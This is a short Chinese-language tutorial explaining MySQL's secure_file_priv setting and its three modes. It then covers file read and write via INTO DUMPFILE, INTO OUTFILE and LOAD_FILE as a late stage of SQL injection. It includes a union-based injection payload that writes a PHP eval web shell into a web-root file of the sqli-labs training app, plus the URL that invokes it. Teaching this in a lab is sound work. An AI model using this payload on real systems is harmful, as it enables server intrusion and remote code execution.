secure_file_priv是MySQL中的系統(tǒng)變量，用于限制文件的讀取和寫入。

該參數的設置可以通過my.ini(windows版本)/my.cnf(Linux版本)中設置。

修改完參數之后，必須重啟數據庫才能生效。

啟動MySQL，先查看secure_file_priv的值。

命令：show variables like "secure%" 或  select @@secure_file_priv;

1.secure_file_priv = NULL ，限制文件的讀取和寫入。

2.secure_file_priv = 文件路徑 ，限制文件的讀取和寫入只能在設定的文件夾中。

3.secure_file_priv= "", 對文件和讀取和寫入沒有任何限制。

【MySQL漏洞注入后期】

1. select *** into dumpfile 文件路徑；

內容在文件中是以一行的形式呈現(xiàn)，多行數據會出現(xiàn)數據保存不全；

dumpfile只能寫一行，并且輸出中不存在任何格式。

2.select  *** into outfile  文件路徑；

內容有特殊格式轉換，該換行換行，較比dumpfile更加好用；

outfile可以寫入多行數據，并且字段和行終止符都可以作為格式輸出。

例如：?id=1')) union select 1,"<?php eval($_REQUEST[123]) ?>",3 into outfile "C://phpStudy//WWW//sqli-labs-master//Less-7//test.php" -- +

調用：url/test.php?123=phpinfo();

3.select  *** load_file （下載文件）

select  load_file(文件路徑);

到此這篇關于Mysql 中的secure_file_priv參數設置的文章就介紹到這了,更多相關mysql secure_file_priv參數設置內容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關文章希望大家以后多多支持腳本之家！

最新評論